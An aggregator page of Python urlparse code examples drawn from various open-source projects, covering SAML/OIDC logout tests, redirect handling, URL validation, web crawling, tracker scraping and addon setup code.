Python urlparse Examples, urllib.parse.urlparse Python Examples

Example #1

0

Show file

File: auth_test.py Project: FancyFane/python3-saml

    def testProcessSLORequestInvalidValid(self):
        """
        Tests the process_slo method of the OneLogin_Saml2_Auth class
        Case Invalid Logout Request
        """
        settings_info = self.loadSettingsJSON()
        request_data = self.get_request()
        message = self.file_contents(join(self.data_path, 'logout_requests', 'logout_request_deflated.xml.base64'))
        request_data['get_data']['SAMLRequest'] = message
        auth = OneLogin_Saml2_Auth(request_data, old_settings=settings_info)
        target_url = auth.process_slo(True)
        parsed_query = parse_qs(urlparse(target_url)[4])
        self.assertEqual(len(auth.get_errors()), 0)
        slo_url = settings_info['idp']['singleLogoutService']['url']
        self.assertIn(slo_url, target_url)
        self.assertIn('SAMLResponse', parsed_query)
        #self.assertNotIn('RelayState', parsed_query)

        auth.set_strict(True)
        auth.process_slo(True)
        # Fail due destination missmatch
        self.assertEqual(auth.get_errors(), ['invalid_logout_request'])

        auth.set_strict(False)
        target_url_2 = auth.process_slo(True)
        parsed_query_2 = parse_qs(urlparse(target_url_2)[4])
        self.assertEqual(len(auth.get_errors()), 0)
        slo_url = settings_info['idp']['singleLogoutService']['url']
        self.assertIn(slo_url, target_url_2)
        self.assertIn('SAMLResponse', parsed_query_2)

Example #2

0

Show file

File: auth.py Project: jupyterhub/jupyterhub

    def make_absolute_redirect_uri(self, uri):
        """Make absolute redirect URIs

        internal redirect uris, e.g. `/user/foo/oauth_handler`
        are allowed in jupyterhub, but oauthlib prohibits them.
        Add `$HOST` header to redirect_uri to make them acceptable.

        Currently unused in favor of monkeypatching
        oauthlib.is_absolute_uri to skip the check
        """
        redirect_uri = self.get_argument('redirect_uri')
        if not redirect_uri or not redirect_uri.startswith('/'):
            return uri
        # make absolute local redirects full URLs
        # to satisfy oauthlib's absolute URI requirement
        redirect_uri = (
            self.request.protocol + "://" + self.request.headers['Host'] + redirect_uri
        )
        parsed_url = urlparse(uri)
        query_list = parse_qsl(parsed_url.query, keep_blank_values=True)
        for idx, item in enumerate(query_list):
            if item[0] == 'redirect_uri':
                query_list[idx] = ('redirect_uri', redirect_uri)
                break

        return urlunparse(urlparse(uri)._replace(query=urlencode(query_list)))

Example #3

0

Show file

File: voluptuous.py Project: jkrell/voluptuous

def Url(v):
    """Verify that the value is a URL."""
    try:
        urlparse.urlparse(v)
        return v
    except:
        raise ValueError

Example #4

0

Show file

File: auth_test.py Project: FancyFane/python3-saml

    def testLoginIsPassive(self):
        """
        Tests the login method of the OneLogin_Saml2_Auth class
        Case Logout with no parameters. A AuthN Request is built with IsPassive and redirect executed
        """
        settings_info = self.loadSettingsJSON()
        return_to = u'http://example.com/returnto'
        settings_info['idp']['singleSignOnService']['url']

        auth = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url = auth.login(return_to)
        parsed_query = parse_qs(urlparse(target_url)[4])
        sso_url = settings_info['idp']['singleSignOnService']['url']
        self.assertIn(sso_url, target_url)
        self.assertIn('SAMLRequest', parsed_query)
        request = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query['SAMLRequest'][0]))
        self.assertNotIn('IsPassive="true"', request)

        auth_2 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url_2 = auth_2.login(return_to, False, False)
        parsed_query_2 = parse_qs(urlparse(target_url_2)[4])
        self.assertIn(sso_url, target_url_2)
        self.assertIn('SAMLRequest', parsed_query_2)
        request_2 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_2['SAMLRequest'][0]))
        self.assertNotIn('IsPassive="true"', request_2)

        auth_3 = OneLogin_Saml2_Auth(self.get_request(), old_settings=settings_info)
        target_url_3 = auth_3.login(return_to, False, True)
        parsed_query_3 = parse_qs(urlparse(target_url_3)[4])
        self.assertIn(sso_url, target_url_3)
        self.assertIn('SAMLRequest', parsed_query_3)
        request_3 = compat.to_string(OneLogin_Saml2_Utils.decode_base64_and_inflate(parsed_query_3['SAMLRequest'][0]))
        self.assertIn('IsPassive="true"', request_3)

Example #5

0

Show file

File: viaplay.py Project: olof/debian-svtplay-dl

 def _isswe(self, url):
     if re.search(r".se$", urlparse(url).netloc):
         return "sasong"
     elif re.search(r".dk$", urlparse(url).netloc):
         return "saeson"
     else:
         return "sesong"

Example #6

0

Show file

File: mit.py Project: mark7/kdcproxy

    def __init__(self, *args, **kwargs):
        self.__config = {}
        with KRB5Profile() as prof:
            # Load DNS setting
            self.__config["dns"] = prof.get_bool("libdefaults",
                                                 "dns_fallback",
                                                 default=True)
            if "dns_lookup_kdc" in dict(prof.section("libdefaults")):
                self.__config["dns"] = prof.get_bool("libdefaults",
                                                     "dns_lookup_kdc",
                                                     default=True)

            # Load all configured realms
            self.__config["realms"] = {}
            for realm, values in prof.section("realms"):
                rconf = self.__config["realms"].setdefault(realm, {})
                for server, hostport in values:
                    if server not in self.CONFIG_KEYS:
                        continue

                    parsed = urlparse.urlparse(hostport)
                    if parsed.hostname is None:
                        scheme = {'kdc': 'kerberos'}.get(server, 'kpasswd')
                        parsed = urlparse.urlparse(scheme + "://" + hostport)

                    if parsed.port is not None and server == 'admin_server':
                        hostport = hostport.split(':', 1)[0]
                        parsed = urlparse.urlparse("kpasswd://" + hostport)

                    rconf.setdefault(server, []).append(parsed.geturl())

Example #7

0

Show file

File: www.py Project: thefinn93/domainchecker

    def check(self, domain):
        import requests
        from urllib.parse import urlparse

        score = 0
        reason = ""

        nakedreq = requests.get("http://%s" % domain)
        nakedreqURL = urlparse(nakedreq.url)
        wwwreq = requests.get("http://www.%s" % domain)
        wwwreqURL = urlparse(wwwreq.url)


        if nakedreqURL.netloc == domain:
            score = 0
            reason = "Naked domain (%s) does not redirect to www (but www does not redirect to naked)" % domain
            if wwwreqURL.netloc == domain:
                score = 1
                reason = "www.%s redirects to %s" % (domain, domain)
        elif nakedreqURL.netloc == "www.%s" % domain:
            score = -1
            reason = "Naked domain redirects to www."

        return {
            "score": score,
            "reason": reason
        }

Example #8

0

Show file

File: test_suomifi_authentication.py Project: City-of-Helsinki/hkisaml

def test_suomifi_logout_sp_request_invalid_token(django_client, django_user_model, fixed_saml_id):
    oidc_client = create_oidc_client()
    user = create_user(django_user_model)
    create_social_user(user)
    create_oidc_token(user, oidc_client)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)
    args = {
        'id_token_hint': ID_TOKEN_JWT_INVALID,
        'post_logout_redirect_uri': REDIRECT_URI,
    }
    logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args))
    logout_page_response = django_client.get(logout_page_url)

    # If the token hint is not recognized but the client has valid session we
    # still perform logout as we are able to deduce enough information to log
    # the client out. We are unable to remove the ID token and we do not have
    # a way to deduce the final redirect after Suomi.fi callback so the
    # RelayState parameter will be missing from the SAML request.
    assert Token.objects.count() == 1
    assert logout_page_response.status_code == 302
    suomifi_redirect = urlparse(logout_page_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_request = load_file('suomifi_logout_request.xml')
    expected_logout_signature = load_file('suomifi_logout_without_relaystate_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_request == expected_logout_request
    assert 'RelayState' not in suomifi_query_params
    assert suomifi_query_params['Signature'][0] == expected_logout_signature

Example #9

0

Show file

File: test_suomifi_authentication.py Project: City-of-Helsinki/hkisaml

def test_suomifi_idp_logout(django_client, fixed_saml_id):
    '''Suomi.fi use cases #4: receiving logout request, and #6: sending logout response'''
    create_oidc_client()
    args = {
        'SAMLRequest': load_file('suomifi_idp_logout_request_encoded.b64').decode(),
        'RelayState': RELAY_STATE,
        'SigAlg': 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256',
        'Signature': load_file('suomifi_idp_logout_signature.b64').decode()
    }
    callback_url = reverse('auth_backends:suomifi_logout_callback') + '?{}'.format(urlencode(args))
    callback_response = django_client.get(callback_url)

    # IdP initiated logout request results in redirect to Suomi.fi SLO URL with
    # SAML response and RelayState from request.
    assert callback_response.status_code == 302
    suomifi_redirect = urlparse(callback_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_response = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLResponse'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_response = load_file('suomifi_idp_logout_response.xml')
    expected_logout_signature = load_file('suomifi_idp_logout_response_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_response == expected_logout_response
    assert suomifi_query_params['RelayState'][0] == RELAY_STATE
    assert suomifi_query_params['Signature'][0] == expected_logout_signature

Example #10

0

Show file

File: __init__.py Project: code-for-england/projectmonitor

def status():
    with open(PROJECTS_FILE) as file:
        projects = json.load(file)

    try:
        for project in projects:
            _, host, path, _, _, _ = urlparse(project['travis url'])
            api_url = 'https://api.{host}/repos{path}'.format(**locals())
            resp = get(api_url)

            # See if the Github URL has moved.
            if resp.status_code == 404:
                github_url = 'https://github.com{path}'.format(**locals())
                resp = get(github_url)

                if resp.status_code == 200:
                    _, _, github_path, _, _, _ = urlparse(resp.url)

                    if github_path != path:
                        message = 'Error in {guid}: {path} has moved to {github_path}'
                        kwargs = dict(guid=project['guid'], **locals())
                        raise Exception(message.format(**kwargs))

            if resp.status_code != 200:
                message = 'Missing {guid}: no {travis url}'
                raise Exception(message.format(**project))
    except Exception as e:
        status = str(e)
    else:
        status = 'ok'

    return jsonify(dict(status=status,
                        updated=int(time()),
                        dependencies=['Travis', 'Github'],
                        resources={}))

Example #11

0

Show file

File: test_suomifi_authentication.py Project: City-of-Helsinki/hkisaml

def test_suomifi_logout_sp_request(django_client, django_user_model, fixed_saml_id):
    '''Suomi.fi use case #3: sending logout request'''
    oidc_client = create_oidc_client()
    user = create_user(django_user_model)
    create_social_user(user)
    create_oidc_token(user, oidc_client)
    django_client.login(username=TEST_USER, password=TEST_PASSWORD)
    args = {
        'id_token_hint': ID_TOKEN_JWT,
        'post_logout_redirect_uri': REDIRECT_URI,
    }
    logout_page_url = reverse('end-session') + '?{}'.format(urlencode(args))
    logout_page_response = django_client.get(logout_page_url)

    # Logout request results in redirect to Suomi.fi with a SAML message in
    # query parameters. The OIDC token for the user is deleted.
    assert Token.objects.count() == 0
    assert logout_page_response.status_code == 302
    suomifi_redirect = urlparse(logout_page_response.url)
    suomifi_query_params = parse_qs(suomifi_redirect.query)
    suomifi_saml_request = SAMLUtils.decode_base64_and_inflate(suomifi_query_params['SAMLRequest'][0])
    expected_slo_url = urlparse(getattr(settings, 'SOCIAL_AUTH_SUOMIFI_ENABLED_IDPS')['suomifi']['logout_url'])
    expected_logout_request = load_file('suomifi_logout_request.xml')
    expected_logout_signature = load_file('suomifi_logout_signature.b64').decode()
    assert suomifi_redirect[:3] == expected_slo_url[:3]
    assert suomifi_saml_request == expected_logout_request
    assert suomifi_query_params['RelayState'][0] == '{"cli": "test_client", "idx": 0}'
    assert suomifi_query_params['Signature'][0] == expected_logout_signature

Example #12

0

Show file

File: browsers.py Project: wazari972/weboob

    def get_referrer(self, oldurl, newurl):
        """
        Get the referrer to send when doing a request.
        If we should not send a referrer, it will return None.

        Reference: https://en.wikipedia.org/wiki/HTTP_referer

        :param oldurl: Current absolute URL
        :type oldurl: str or None

        :param newurl: Target absolute URL
        :type newurl: str

        :rtype: str or None
        """
        if oldurl is None:
            return None
        old = urlparse(oldurl)
        new = urlparse(newurl)
        # Do not leak secure URLs to insecure URLs
        if old.scheme == 'https' and new.scheme != 'https':
            return None
        # Reloading the page. Usually no referrer.
        if oldurl == newurl:
            return None
        # TODO maybe implement some *optional* privacy features:
        # * do not leak referrer to other domains (often breaks websites)
        # * send a fake referrer (root of the current domain)
        # * never send the referrer
        # Inspired by the RefControl Firefox addon.
        return oldurl

Example #13

0

Show file

File: calc.py Project: hatred/dcos

def validate_url(url: str):
    try:
        urlparse(url)
    except ValueError as ex:
        raise AssertionError(
            "Couldn't parse given value `{}` as an URL".format(url)
        ) from ex

Example #14

0

Show file

File: generic_io.py Project: spacetelescope/asdf

def relative_uri(source, target):
    """
    Make a relative URI from source to target.
    """
    su = urlparse.urlparse(source)
    tu = urlparse.urlparse(target)
    extra = list(tu[3:])
    relative = None
    if tu[0] == '' and tu[1] == '':
        if tu[2] == su[2]:
            relative = ''
        elif not tu[2].startswith('/'):
            relative = tu[2]
    elif su[0:2] != tu[0:2]:
        return target

    if relative is None:
        if tu[2] == su[2]:
            relative = ''
        else:
            relative = os.path.relpath(tu[2], os.path.dirname(su[2]))
    if relative == '.':
        relative = ''
    relative = urlparse.urlunparse(["", "", relative] + extra)
    return relative

Example #15

0

Show file

File: location_mapper.py Project: EHRI/resydes

    def find_local_path(self, uri, default_destination=None, netloc=False, infix=""):
        base_uri = uri
        destination = None
        path = None
        postfix = None
        local_path = None
        while destination is None:
            try:
                destination = self.mappings[base_uri]
                postfix = uri[len(base_uri) + 1:]
            except KeyError:
                if path == "":
                    break
                else:
                    (base_uri, path) = DestinationMap.shorten(base_uri)

        if destination is None:
            destination = default_destination

        if destination is None and netloc:
            destination = urlparse(uri).netloc
            l = len(urlparse(uri).scheme) + len(destination)
            postfix = uri[l + 4:]

        if destination is not None and not os.path.isabs(destination):
            destination = os.path.join(self.root_folder, destination)

        if destination is not None and postfix is not None:
            local_path = os.path.join(destination, infix, postfix)

        return base_uri, local_path

Example #16

0

Show file

File: whois.py Project: AlecChou/thefuck

def get_new_command(command, settings):
    url = command.script.split()[1]

    if '/' in command.script:
        return 'whois ' + urlparse(url).netloc
    elif '.' in command.script:
        return 'whois ' + '.'.join(urlparse(url).path.split('.')[1:])

Example #17

0

Show file

File: validate.py Project: gc3-uzh-ch/elasticluster

def url(value):
    try:
        url_str = str(value)
        urlparse(url_str)
        return url_str
    except Exception as err:
        raise ValueError("Invalid URL `{0}`: {1}".format(value, err))

Example #18

0

Show file

File: crawler.py Project: kad4/gen

    def isArticle(self, url, soup):
        # Function determines if given url opens an news article
        articleURL = url
        article = False
        netloc = urlparse(url).netloc
        path = urlparse(url).path
        if netloc == 'www.ratopati.com':
            cond1 = re.match(r'/\d\d\d\d/\d\d/\d\d/\d\d\d\d\d\d.html', path) is not None
            div = soup.find('div', {'id': 'sing_cont'})
            cond2 = div is not None
            if (cond1 and cond2) is True:
                articleTitle = div.h2.text.encode('utf-8', 'ignore')
                articleDatelst = path.split('.')[0].split('/')[1:-1]
                articleDate = datetime(int(articleDatelst[0]),int(articleDatelst[1]),int(articleDatelst[2]))

                articleURL = url
                article = True
        if netloc == 'www.setopati.com':
            pass
        else:
            pass

        if article is True:
            return [True, articleTitle, articleDate, articleURL]
        else:
            return [False]

Example #19

0

Show file

File: websocketd.py Project: wijnen/python-websocketd

	def _line(self, l):	# {{{
		if DEBUG > 4:
			log('Debug: Received line: %s' % l)
		if self.address is not None:
			if not l.strip():
				self._handle_headers()
				return
			try:
				key, value = l.split(':', 1)
			except ValueError:
				log('Invalid header line: %s' % l)
				return
			self.headers[key.lower()] = value.strip()
			return
		else:
			try:
				self.method, url, self.standard = l.split()
				for prefix in self.proxy:
					if url.startswith('/' + prefix + '/') or url == '/' + prefix:
						self.prefix = '/' + prefix
						break
				else:
					self.prefix = ''
				address = urlparse(url)
				path = address.path[len(self.prefix):] or '/'
				self.url = path + url[len(address.path):]
				self.address = urlparse(self.url)
				self.query = parse_qs(self.address.query)
			except:
				traceback.print_exc()
				self.server.reply(self, 400)
				self.socket.close()
			return

Example #20

0

Show file

File: test_pages.py Project: TensorFlowHub/jupyterhub

def test_spawn_redirect(app, io_loop):
    name = 'wash'
    cookies = app.login_user(name)
    u = app.users[orm.User.find(app.db, name)]
    
    # ensure wash's server isn't running:
    r = api_request(app, 'users', name, 'server', method='delete', cookies=cookies)
    r.raise_for_status()
    status = io_loop.run_sync(u.spawner.poll)
    assert status is not None
    
    # test spawn page when no server is running
    r = get_page('spawn', app, cookies=cookies)
    r.raise_for_status()
    print(urlparse(r.url))
    path = urlparse(r.url).path
    assert path == ujoin(app.base_url, 'user/%s' % name)
    
    # should have started server
    status = io_loop.run_sync(u.spawner.poll)
    assert status is None
    
    # test spawn page when server is already running (just redirect)
    r = get_page('spawn', app, cookies=cookies)
    r.raise_for_status()
    print(urlparse(r.url))
    path = urlparse(r.url).path
    assert path == ujoin(app.base_url, '/user/%s' % name)

Example #21

0

Show file

File: plugins.py Project: arhik/pulsar

    def _do_redirect(self, response):
        request = response.request
        # done with current response
        url = response.headers.get('location')
        # Handle redirection without scheme (see: RFC 1808 Section 4)
        if url.startswith('//'):
            parsed_rurl = urlparse(request.full_url)
            url = '%s:%s' % (parsed_rurl.scheme, url)
        # Facilitate non-RFC2616-compliant 'location' headers
        # (e.g. '/path/to/resource' instead of
        # 'http://domain.tld/path/to/resource')
        if not urlparse(url).netloc:
            url = urljoin(request.full_url,
                          # Compliant with RFC3986, we percent
                          # encode the url.
                          requote_uri(url))
        history = request.history
        if history and len(history) >= request.max_redirects:
            raise TooManyRedirects(response)

        params = request.inp_params.copy()
        params['history'] = copy(history) if history else []
        params['history'].append(response)
        if response.status_code == 303:
            method = 'GET'
            params.pop('data', None)
            params.pop('files', None)
        else:
            method = request.method
        response.request_again = request_again(method, url, params)
        return response

Example #22

0

Show file

File: crawl.py Project: lespea/50app-01-crawler

def parse(
          target, max_level, stay_local, search_string,
          level=1, parsed_links={}):
    if (level > max_level):
        return parsed_links

    print("Parsing [level %d] - %s" % (level, target))

    try:
        hostname = urlparse(target)[1]
        tree = lxml.html.parse(target)
        root = tree.getroot()

        text = ''.join(root.itertext())
        parsed_links[target] = True if search_string.search(text) else False

        root.make_links_absolute(root.base)
        for link in root.iterlinks():
            href = link[2]
            if (stay_local and urlparse(href)[1] != hostname):
                continue
            if (href not in parsed_links):
                parse(href, max_level, stay_local, search_string,
                      level + 1, parsed_links)
    except Exception as e:
        print("Couldn't parse the target {}: {!s}".format(target, e))

    return parsed_links

Example #23

0

Show file

File: websocket.py Project: pashinin/channels

    def match_allowed_origin(self, parsed_origin, pattern):
        """
        Returns ``True`` if the origin is either an exact match or a match
        to the wildcard pattern. Compares scheme, domain, port of origin and pattern.

        Any pattern can be begins with a scheme. After the scheme must be a domain,
        or just domain without scheme.
        Any domain beginning with a period corresponds to the domain and all
        its subdomains (for example, ``.example.com`` ``example.com``
        and any subdomain). Also with scheme (for example, ``http://.example.com``
        ``http://exapmple.com``). After the domain there must be a port,
        but it can be omitted.

        Note. This function assumes that the given origin has a schema, domain and port,
        or only domain. Port is optional.
        """
        # Get ResultParse object
        parsed_pattern = urlparse(pattern.lower(), scheme=None)
        if parsed_pattern.scheme is None:
            pattern_hostname = urlparse("//" + pattern).hostname or pattern
            return is_same_domain(parsed_origin.hostname, pattern_hostname)
        # Get origin.port or default ports for origin or None
        origin_port = self.get_origin_port(parsed_origin)
        # Get pattern.port or default ports for pattern or None
        pattern_port = self.get_origin_port(parsed_pattern)
        # Compares hostname, scheme, ports of pattern and origin
        if parsed_pattern.scheme == parsed_origin.scheme and origin_port == pattern_port \
                and is_same_domain(parsed_origin.hostname, parsed_pattern.hostname):
            return True
        return False

Example #24

0

Show file

File: scraper.py Project: henrytrager/openbay-crawler

def scrape(tracker, hashes):
    """
	Returns the list of seeds, peers and downloads a torrent info_hash has, according to the specified tracker

	Args:
		tracker (str): The announce url for a tracker, usually taken directly from the torrent metadata
		hashes (list): A list of torrent info_hash's to query the tracker for

	Returns:
		A dict of dicts. The key is the torrent info_hash's from the 'hashes' parameter,
		and the value is a dict containing "seeds", "peers" and "complete".
		Eg:
		{
			"2d88e693eda7edf3c1fd0c48e8b99b8fd5a820b2" : { "seeds" : "34", "peers" : "189", "complete" : "10" },
			"8929b29b83736ae650ee8152789559355275bd5c" : { "seeds" : "12", "peers" : "0", "complete" : "290" }
		}
	"""
    tracker = tracker.lower()
    parsed = urlparse(tracker)
    if parsed.scheme == "udp":
        return scrape_udp(parsed, hashes)

    if parsed.scheme in ["http", "https"]:
        if "announce" not in tracker:
            raise RuntimeError("%s doesnt support scrape" % tracker)
        parsed = urlparse(tracker.replace("announce", "scrape"))
        return scrape_http(parsed, hashes)

    raise RuntimeError("Unknown tracker scheme: %s" % parsed.scheme)

Example #25

0

Show file

File: scraper.py Project: hofstragroup/wayback_scraper

 def check_url_redirection(self, url_record):
     """ Checks redirection in URL and saves new domains, if any """
     current_url = url_record['url']
     recursive, url = self._check_redirection(current_url)
     url_record['final_url'] = url
     if recursive:
         print('    This is a recursive redirect. Action: Skipped!')
         url_record['redirected'] = True
         url_record['recursive'] = True
     else: 
         url_record['recursive'] = False
         if url == current_url:
             url_record['redirected'] = False
         else:
             url_record['redirected'] = True
             domain1 = _extract_domain(current_url)
             domain2 = _extract_domain(url)
             if urlparse(domain1).netloc == urlparse(domain2).netloc:
                 url_record['same_domain'] = True
             else:
                 url_record['same_domain'] = False
                 if domain2 not in self.new_domains:
                     # Make sure the domain is not in the blacklist
                     if urlparse(domain2).netloc not in self.blacklist:
                         # Make sure that the URL is that of a web archive snapshot
                         if '://web.archive.org/web/' in url:
                             print('    New domain found: %s' % domain2)
                             self.new_domains.append(domain2)
                 
     return url_record

Example #26

0

Show file

File: create_graphs.py Project: lspinheiro/TCC

def create_graphml(dists_triu, data, time_max=164, sim_min=0.8):
    size = dists_triu.shape[0]
    G = nx.DiGraph()
    G.add_node(0, step=0, date=0,domain=urlparse(data[0]['link']).netloc)
    date_init = data[0]['published']
    outs = []
    for i in range(1, size):
        pub_i = data[i]['published']
        column = list(dists_triu[:,i])
        pos = get_pos(data, pub_i, column, time_max, sim_min, outs)

        if pos != None:
            if pos not in G.nodes():
                domain_1 = urlparse(data[pos]['link']).netloc
                date_1 = create_date(date_init, data[pos]['published'], 5)
                G.add_node(pos, date=date_1, domain=domain_1)
            if i not in G.nodes():
                domain_2 = urlparse(data[i]['link']).netloc
                date_2 = create_date(date_init, pub_i, 5)
                G.add_node(i, date=date_2, domain=domain_2)

            G.add_edge(pos, i)
        else:
            outs.append(i)
    return G

Example #27

0

Show file

File: utils.py Project: aaronkurtz/gourmand

def fix_content(content):
    """
    Parse article content to rewrite it for a better reader experience
    """
    parsed_content = BeautifulSoup(content, "html.parser")
    CAMO_KEY = settings.CAMO_KEY
    for img in parsed_content.find_all('img'):
        if img.get('src') and CAMO_KEY and urlparse(img['src']).scheme != 'https':
            img['src'] = get_camo_url(img['src'])

        del img['srcset']
        del img['sizes']
        img['class'] = img.get('class', []) + ['img-responsive']

    for div in parsed_content.find_all('div'):
        del div['style']

    for table in parsed_content.find_all('table'):
        table['class'] = table.get('class', []) + ['table-responsive']

    for a in parsed_content.find_all('a'):
        a['target'] = '_blank'

    for iframe in parsed_content.find_all('iframe'):
        url = urlparse(iframe['src'])
        if url.scheme != 'https' and url.netloc in SSLIFY_HOST_LIST:
            iframe['src'] = url._replace(scheme='https').geturl()

    return str(parsed_content)

Example #28

0

Show file

File: s3_key_sensor.py Project: apache/incubator-airflow

 def __init__(self,
              bucket_key,
              bucket_name=None,
              wildcard_match=False,
              aws_conn_id='aws_default',
              verify=None,
              *args,
              **kwargs):
     super().__init__(*args, **kwargs)
     # Parse
     if bucket_name is None:
         parsed_url = urlparse(bucket_key)
         if parsed_url.netloc == '':
             raise AirflowException('Please provide a bucket_name')
         else:
             bucket_name = parsed_url.netloc
             bucket_key = parsed_url.path.lstrip('/')
     else:
         parsed_url = urlparse(bucket_key)
         if parsed_url.scheme != '' or parsed_url.netloc != '':
             raise AirflowException('If bucket_name is provided, bucket_key' +
                                    ' should be relative path from root' +
                                    ' level, rather than a full s3:// url')
     self.bucket_name = bucket_name
     self.bucket_key = bucket_key
     self.wildcard_match = wildcard_match
     self.aws_conn_id = aws_conn_id
     self.verify = verify

Example #29

0

Show file

File: views.py Project: JonahKE/umap

def validate_url(request):
    assert request.method == "GET"
    assert request.is_ajax()
    url = request.GET.get('url')
    assert url
    try:
        URLValidator(url)
    except ValidationError:
        raise AssertionError()
    assert 'HTTP_REFERER' in request.META
    referer = urlparse(request.META.get('HTTP_REFERER'))
    toproxy = urlparse(url)
    local = urlparse(settings.SITE_URL)
    assert toproxy.hostname
    assert referer.hostname == local.hostname
    assert toproxy.hostname != "localhost"
    assert toproxy.netloc != local.netloc
    try:
        # clean this when in python 3.4
        ipaddress = socket.gethostbyname(toproxy.hostname)
    except:
        raise AssertionError()
    assert not ipaddress.startswith('127.')
    assert not ipaddress.startswith('192.168.')
    return url

Example #30

0

Show file

File: __init__.py Project: boced66/home-assistant

def _is_latest(js_option, request):
    """
    Return whether we should serve latest untranspiled code.

    Set according to user's preference and URL override.
    """
    import hass_frontend

    if request is None:
        return js_option == 'latest'

    # latest in query
    if 'latest' in request.query or (
            request.headers.get('Referer') and
            'latest' in urlparse(request.headers['Referer']).query):
        return True

    # es5 in query
    if 'es5' in request.query or (
            request.headers.get('Referer') and
            'es5' in urlparse(request.headers['Referer']).query):
        return False

    # non-auto option in config
    if js_option != 'auto':
        return js_option == 'latest'

    useragent = request.headers.get('User-Agent')

    return useragent and hass_frontend.version(useragent)

Example #31

0

Show file

File: HtmlParser.py Project: IstrazivackiCentarMladih/Crawlex

def network_location(url):
    o = urlparse(url,scheme='http')
    o = o.netloc
    return o

Example #32

0

Show file

File: news_scraper.py Project: K-Kielak/vera

 def _extract_site_name(url):
     parsed = urlparse(url)
     domain = '{uri.netloc}'.format(uri=parsed)
     return domain

Example #33

0

Show file

File: utils.py Project: pytorch/kineto

def parse_blob_url(url):
    from urllib import parse
    url_path = parse.urlparse(url)

    parts = url_path.path.lstrip('/').split('/', 1)
    return url_path.netloc, tuple(parts)

Example #34

0

Show file

File: common.py Project: MateusTars/amazon-xbmc

    def __init__(self):
        try:
            from urllib.parse import urlparse
        except ImportError:
            from urlparse import urlparse

        # argv[0] can contain the entire path, so we limit ourselves to the base url
        pid = urlparse(argv[0])
        self.pluginid = '{}://{}/'.format(pid.scheme, pid.netloc)
        self.pluginhandle = int(
            argv[1]) if (1 < len(argv)) and self.pluginid else -1

        self._globals['monitor'] = xbmc.Monitor()
        self._globals['addon'] = xbmcaddon.Addon()
        self._globals['dialog'] = xbmcgui.Dialog()
        # self._globals['dialogprogress'] = xbmcgui.DialogProgress()
        self._globals['hasExtRC'] = xbmc.getCondVisibility(
            'System.HasAddon(script.chromium_remotecontrol)')

        self._globals['DATA_PATH'] = py2_decode(
            xbmc.translatePath(self.addon.getAddonInfo('profile')))
        self._globals['CONFIG_PATH'] = OSPJoin(self._globals['DATA_PATH'],
                                               'config')
        self._globals['HOME_PATH'] = py2_decode(
            xbmc.translatePath('special://home'))
        self._globals['PLUGIN_PATH'] = py2_decode(
            self._globals['addon'].getAddonInfo('path'))

        # With main PATHs configured, we initialise the get/write path attributes
        # and generate/retrieve the device ID
        getConfig.configPath = self._globals['CONFIG_PATH']
        writeConfig.configPath = self._globals['CONFIG_PATH']
        self._globals['deviceID'] = self.genID()

        self._globals['__plugin__'] = self._globals['addon'].getAddonInfo(
            'name')
        self._globals['__authors__'] = self._globals['addon'].getAddonInfo(
            'author')
        self._globals['__credits__'] = ""
        self._globals['__version__'] = self._globals['addon'].getAddonInfo(
            'version')

        # OS Detection
        if xbmc.getCondVisibility('system.platform.windows'):
            self._globals['platform'] |= self.OS_WINDOWS
        if xbmc.getCondVisibility('system.platform.linux'):
            self._globals['platform'] |= self.OS_LINUX
        if xbmc.getCondVisibility('system.platform.osx'):
            self._globals['platform'] |= self.OS_OSX
        if xbmc.getCondVisibility('system.platform.android'):
            self._globals['platform'] |= self.OS_ANDROID
        if (xbmcvfs.exists('/etc/os-release')) and (
                'libreelec' in xbmcvfs.File('/etc/os-release').read()):
            self._globals['platform'] |= self.OS_LE

        # Save the language code for HTTP requests and set the locale for l10n
        loc = getdefaultlocale()[0]
        userAcceptLanguages = 'en-gb{}, en;q=0.5'
        self._globals['userAcceptLanguages'] = userAcceptLanguages.format(
            '') if not loc else '{}, {}'.format(
                loc.lower().replace('_', '-'),
                userAcceptLanguages.format(';q=0.75'))

        self._globals['CONTEXTMENU_MULTIUSER'] = [
            (getString(30130, self._globals['addon']).split('…')[0],
             'RunPlugin({}?mode=LogIn)'.format(self.pluginid)),
            (getString(30131, self._globals['addon']).split('…')[0],
             'RunPlugin({}?mode=removeUser)'.format(self.pluginid)),
            (getString(30132, self._globals['addon']),
             'RunPlugin({}?mode=renameUser)'.format(self.pluginid))
        ]

Example #35

0

Show file

File: mirror.py Project: pypa/bandersnatch

 def _file_url_to_local_url(self, url: str) -> str:
     parsed = urlparse(url)
     if not parsed.path.startswith("/packages"):
         raise RuntimeError(f"Got invalid download URL: {url}")
     prefix = self.root_uri if self.root_uri else "../.."
     return prefix + parsed.path

Example #36

0

Show file

File: get_crackme.py Project: mentix02/ctfs

import sys
import wget
import zipfile
import subprocess
from urllib.parse import urlparse

password = b'crackmes.one'

if __name__ == '__main__':

    if len(sys.argv) == 2:
        url = sys.argv[1]
    else:
        url = input('enter url : ')

    u_parse = urlparse(url)
    token = u_parse.path.split('/')[-1]
    print(f'downloading "{token}.zip"... ', end='')

    file_name = wget.download(
        f'https://crackmes.one/static/crackme/{token}.zip',
        out=f'zips/{token}.zip',
        bar=None)

    print('\tdone')

    print('extracting files... ', end='')
    z_file = zipfile.ZipFile(file_name)
    z_file.setpassword(password)
    z_file.extractall()

Example #37

0

Show file

